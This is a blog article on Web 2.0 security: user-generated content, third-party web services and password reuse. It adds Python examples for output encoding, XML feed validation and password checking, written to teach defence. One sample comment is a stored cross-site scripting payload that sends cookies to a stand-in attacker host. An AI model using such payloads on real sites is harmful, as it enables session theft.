Web 2.0 + People = New Challenges

This article originally appeared on Verizon Business' ThinkForward blog.  It is written by me with a different audience in mind and is business-centric.  However, there is no harm in posting it here too.

The computer industry loves a good buzzword and "Web 2.0" is no exception to this rule. Journalists have been using the term for some time now, and many of the top sites on the Internet (the likes of Facebook and Twitter) already make use of this Web 2.0 jazz, but what is it and what does it mean for security?  Wikipedia describes Web 2.0 as, "the changing trends in the use of World Wide Web technology and web design that aim to enhance creativity, communications, secure information sharing, collaboration and functionality of the web." In terms of technology this mostly means heavy use of client-side JavaScript, which by now seems to have been around since the beginning of time. What the Wikipedia entry really describes is a change in how the web is used: from static pages to dynamic, user-driven content such as blogs, wikis and social networking sites. As all security-savvy people know, any new technology or trend brings new security implications with it. It's a cat-and-mouse game out there. Web 2.0 involves people heavily, which is a good thing for usability but not such a good thing for security.  Let's look at some of the potential issues.

In at number one is user-generated content. Web 2.0 is all about letting users add their own content in the form of text and photos. If software security has taught us anything, it is never, ever (ever!) to trust input provided by the user. Input can be bad, malformed or just blatantly malicious. Because the data is saved in a backend database and later used to generate pages for other users, a single malicious submission is served to every visitor who views it (stored cross-site scripting is the classic case), so validating content on the way in and encoding it on the way out become even more important.
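The following is an added example, not code from the original article: it contrasts the naive way of rendering stored user content (string concatenation) with a version that validates on submission and encodes for the HTML context at render time. The comment records, the host name `photos.example` and the field names are all constructed for the example.

```python
"""Added example (not from the original article): rendering stored
user-generated content safely.  The sample comments are constructed."""
import html
from urllib.parse import urlsplit

MAX_TEXT = 500  # assumption: the application never needs longer comments

# Constructed sample of what a backend database might hold after users
# have submitted comments and photo links.  The second row is malicious:
# a script in the text and a javascript: URL in the photo field.
STORED_COMMENTS = [
    {"author": "alice", "text": "Nice photo!",
     "photo": "https://photos.example/1.jpg"},
    {"author": "mallory",
     "text": '<script>document.location="https://evil.example/?c="+document.cookie</script>',
     "photo": "javascript:alert(document.cookie)"},
]


def render_unsafe(comment):
    """The classic mistake: stored data is concatenated straight into HTML,
    so whatever mallory submitted runs in every other visitor's browser."""
    return (f'<div class="comment"><b>{comment["author"]}</b>: {comment["text"]}'
            f'<img src="{comment["photo"]}"></div>')


def safe_url(url):
    """Only absolute http(s) URLs are acceptable as image sources; anything
    else (javascript:, data:, relative paths) is dropped."""
    parts = urlsplit(url)
    if parts.scheme in ("http", "https") and parts.netloc:
        return url
    return ""


def accept_submission(author, text, photo):
    """Input validation at submit time: reject what the application never
    needs.  Output encoding at render time still applies afterwards; the
    two are complementary, not alternatives."""
    if not (1 <= len(author) <= 32) or not author.isalnum():
        return False
    if not (1 <= len(text) <= MAX_TEXT):
        return False
    if any(ord(c) < 32 and c not in "\n\t" for c in text):
        return False
    if photo and not safe_url(photo):
        return False
    return True


def render_safe(comment):
    """Encode each value for the context it lands in: HTML text for the
    author and comment body, HTML attribute for the image URL after the
    URL scheme has been validated."""
    author = html.escape(comment["author"])
    text = html.escape(comment["text"])
    photo = html.escape(safe_url(comment["photo"]), quote=True)
    img = f'<img src="{photo}">' if photo else ""
    return f'<div class="comment"><b>{author}</b>: {text}{img}</div>'


def render_page(comments, renderer):
    """Build the comment section with the given renderer."""
    return "\n".join(renderer(c) for c in comments)


if __name__ == "__main__":
    print(render_page(STORED_COMMENTS, render_unsafe))
    print()
    print(render_page(STORED_COMMENTS, render_safe))
```

The point of `accept_submission` is to throw away input the site has no use for (control characters, oversized text, non-http URLs) before it ever reaches the database; the point of `render_safe` is that even data which passed that check is still encoded for the exact place it is inserted, because a later code path may store content through a different route.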

In at number two are web services. Web 2.0 allows different systems to communicate and interface with each other through a common API (Application Programming Interface), usually carried over XML, also known as web services. For instance, this allows one web site to pull photos from a third-party photo-sharing site, interactive maps from another and content from a third. This is a huge change from the past, when all data was taken from one source, often managed by the same organization.

This creates security implications in relation to trust. How do we know the third party is taking security seriously? A compromise at the third party can now directly affect your organization, because data pulled from it is used (and trusted) to build your own pages. The practical consequence is that a partner's web-service response has to be treated with the same suspicion as user input, and the XML parser that reads it is itself exposed to whatever the partner sends. Every web service your site consumes or exposes also widens the attack surface available to an attacker.
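As an added example (not from the original article), here is how a site consuming a partner's XML photo feed can treat that feed as untrusted input: the response is size-limited, documents carrying DTD or entity declarations are refused before the parser sees them, the structure is checked against the fields the site actually needs, and photo URLs are restricted to the host agreed with the partner. The feed format, the host `photos.example`, the size limit and the sample responses are assumptions constructed for the example.

```python
"""Added example (not from the original article): consuming a third-party
XML web-service response as untrusted input.  Feed format, host names and
limits are assumptions made for the example."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

MAX_RESPONSE_BYTES = 256 * 1024            # assumption: a photo feed is small
ALLOWED_PHOTO_HOSTS = {"photos.example"}   # assumption: the partner's host

# Constructed sample responses: one well-formed; one carrying a DOCTYPE
# with an entity declaration (the classic way to abuse an XML parser);
# one whose photo URL points at a host we never agreed to trust.
GOOD_FEED = (b'<photos><photo id="1" url="https://photos.example/1.jpg">'
             b'Beach</photo></photos>')
ENTITY_FEED = (b'<!DOCTYPE photos [<!ENTITY x "abc">]>'
               b'<photos><photo id="2" url="https://photos.example/2.jpg">'
               b'&x;</photo></photos>')
OFFHOST_FEED = (b'<photos><photo id="3" url="https://evil.example/3.jpg">'
                b'Hijacked</photo></photos>')


class UntrustedFeedError(Exception):
    """Raised whenever the partner's response fails a check."""


def parse_photo_feed(raw):
    """Return a list of {id, url, title} dicts or raise UntrustedFeedError.
    Every check treats the partner's data exactly like user input."""
    if len(raw) > MAX_RESPONSE_BYTES:
        raise UntrustedFeedError("response too large")
    # Refuse any document that declares a DTD: this feed never needs one,
    # and DTDs are where entity expansion and external references live.
    if b"<!DOCTYPE" in raw or b"<!ENTITY" in raw:
        raise UntrustedFeedError("DTD/entity declarations not accepted")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise UntrustedFeedError(f"malformed XML: {exc}")
    if root.tag != "photos":
        raise UntrustedFeedError("unexpected root element")
    photos = []
    for el in root.findall("photo"):
        pid = el.get("id", "")
        url = el.get("url", "")
        title = (el.text or "").strip()
        if not re.fullmatch(r"[0-9]{1,12}", pid):
            raise UntrustedFeedError("bad photo id")
        parts = urlsplit(url)
        if parts.scheme != "https" or parts.hostname not in ALLOWED_PHOTO_HOSTS:
            raise UntrustedFeedError("photo URL outside the agreed host")
        if len(title) > 200:
            raise UntrustedFeedError("title too long")
        photos.append({"id": pid, "url": url, "title": title})
    return photos


def fetch_photos_safely(raw):
    """Fail closed: on any problem return no photos rather than rendering
    whatever the partner happened to send."""
    try:
        return parse_photo_feed(raw)
    except UntrustedFeedError:
        return []


if __name__ == "__main__":
    for name, feed in (("good", GOOD_FEED), ("entity", ENTITY_FEED),
                       ("offhost", OFFHOST_FEED)):
        print(name, fetch_photos_safely(feed))
```

Note that the `title` field returned here is still raw partner data; it must be HTML-encoded at render time like any user comment. The allowlisted host check is what limits the damage if the partner is compromised: an attacker who controls the feed can only point at images on the host you already agreed to serve.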

In at number three are people and passwords. Web 2.0 blurs the boundaries between work and personal life. LinkedIn, Facebook and Twitter have both professional and personal uses, and the two often cross over. This has many security and reputation implications; the ones I am most concerned about are information leakage and weak passwords. Web 2.0 is built around community-driven sites with content for and by the users, so users are usually given the ability to create personal profile pages. Facebook is a good example of this. The amount of information that can be gleaned from these unrestricted pages should not be underestimated: employer, job title, colleagues and personal details all feed the reconnaissance phase of an attack, and that information can be used to further attacks on an organization from outside as well as from within.

The second issue is passwords. Time and time again it has been documented that people are the weakest link in security, so education needs to start there. Human beings tend to pick dictionary-based passwords, which are vulnerable to dictionary attacks. For some time now the industry has responded with password complexity rules that require minimum lengths and special characters. This has only partially mitigated the vulnerability: faced with a complexity rule, most users simply decorate a dictionary word with a capital letter, a digit and a symbol, and password-cracking tools apply exactly those decorations as rules on top of their word lists. Another issue is that users often reuse the same password across multiple sites and applications. Internally this isn't as much of a problem; over the Internet, however, a password leaked from one site unlocks every other site where it was reused, and this will only get worse as people sign up to more Web 2.0 sites.
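To make the complexity point concrete, here is an added example (not from the original article) that applies a typical complexity rule and then a dictionary check which first strips the decorations people add to satisfy that rule. The word list, the substitution table and the candidate passwords are constructed for the example; a real deployment would use a large list of dictionary words and previously leaked passwords.

```python
"""Added example (not from the original article): why a complexity rule
alone is a partial answer to dictionary-based passwords.  The word list,
substitution table and candidates are constructed for the example."""
import re

# Constructed mini word list standing in for a real cracking dictionary.
WORDLIST = {"password", "welcome", "letmein", "monkey", "dragon", "summer"}

# Common letter-for-symbol substitutions that crackers undo (or apply)
# automatically; this table is an assumption for the example.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})

# Digits and punctuation people tack on to the front or back of a word.
DECORATION = r"^[0-9!?.,_\-#*]+|[0-9!?.,_\-#*]+$"


def meets_complexity(pw, min_len=8):
    """The policy the article describes: a minimum length plus lower case,
    upper case, a digit and a special character."""
    return (len(pw) >= min_len
            and re.search(r"[a-z]", pw) is not None
            and re.search(r"[A-Z]", pw) is not None
            and re.search(r"[0-9]", pw) is not None
            and re.search(r"[^A-Za-z0-9]", pw) is not None)


def dictionary_core(pw):
    """Strip the decoration, undo the substitutions and lower-case the
    result.  What remains is what a cracker's rule set tries first."""
    core = re.sub(DECORATION, "", pw)
    return core.translate(LEET).lower()


def is_dictionary_based(pw):
    """True when the password is a listed word plus predictable decoration."""
    return dictionary_core(pw) in WORDLIST


def check_password(pw):
    """Return (accepted, reason).  Both checks are applied; passing the
    complexity policy on its own is not enough."""
    if not meets_complexity(pw):
        return False, "does not meet complexity policy"
    if is_dictionary_based(pw):
        return False, "dictionary word with predictable decoration"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("monkey", "P@ssw0rd1!", "Summer2009!", "Tq8#vLm2!zRw"):
        print(f"{candidate!r}: complexity={meets_complexity(candidate)}, "
              f"verdict={check_password(candidate)}")
```

The interesting rows are `P@ssw0rd1!` and `Summer2009!`: both sail through the complexity rule, and both reduce to a word on the list once the decoration is removed, which is precisely the transformation a cracker's rule set performs.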

Don't panic! Change is a good thing. But the security implications of how people are using the web need to be acknowledged and factored into an organization's risk exposure. Education is always key to making sure employees are aware of your organization's security policies, and it is also a good chance to demonstrate how poor security can affect them personally, namely through identity theft. Developers should consider tools and libraries that help them double-check user-generated content: validate it on the way in and encode or sanitize it on the way out, rather than relying on a single check somewhere in the stack. Finally, the risk of a compromise occurring via web services can be mitigated by conducting a security assessment of every endpoint the web services touch, including the third parties, to give added assurance.
